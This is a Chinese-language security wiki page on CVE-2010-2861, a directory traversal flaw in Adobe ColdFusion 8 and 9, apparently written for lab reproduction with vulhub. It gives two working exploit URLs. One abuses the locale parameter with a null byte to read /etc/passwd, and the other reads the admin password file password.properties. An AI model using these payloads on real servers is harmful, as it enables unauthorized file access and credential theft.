menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2010-2861)Adobe ColdFusion 文件读取漏洞 chevron_right (CVE-2010-2861)Adobe ColdFusion 文件读取漏洞.md
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2010-2861)Adobe ColdFusion 文件读取漏洞.md
    922 B / 2021-07-15 19:47:28
        (CVE-2010-2861)Adobe ColdFusion 文件读取漏洞
==============================================

一、漏洞简介
------------

Adobe ColdFusion
8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。

二、漏洞影响
------------

Adobe ColdFusion 8

Adobe ColdFusion 9

三、复现过程
------------

直接访问`http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en`,即可读取文件`/etc/passwd`:

![](./resource/(CVE-2010-2861)AdobeColdFusion文件读取漏洞/media/rId24.png)

读取后台管理员密码`http://www.0-sec.org:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en`:

![](./resource/(CVE-2010-2861)AdobeColdFusion文件读取漏洞/media/rId25.png)

参考链接
--------

> https://vulhub.org/\#/environments/coldfusion/CVE-2010-2861/
    links
    file_download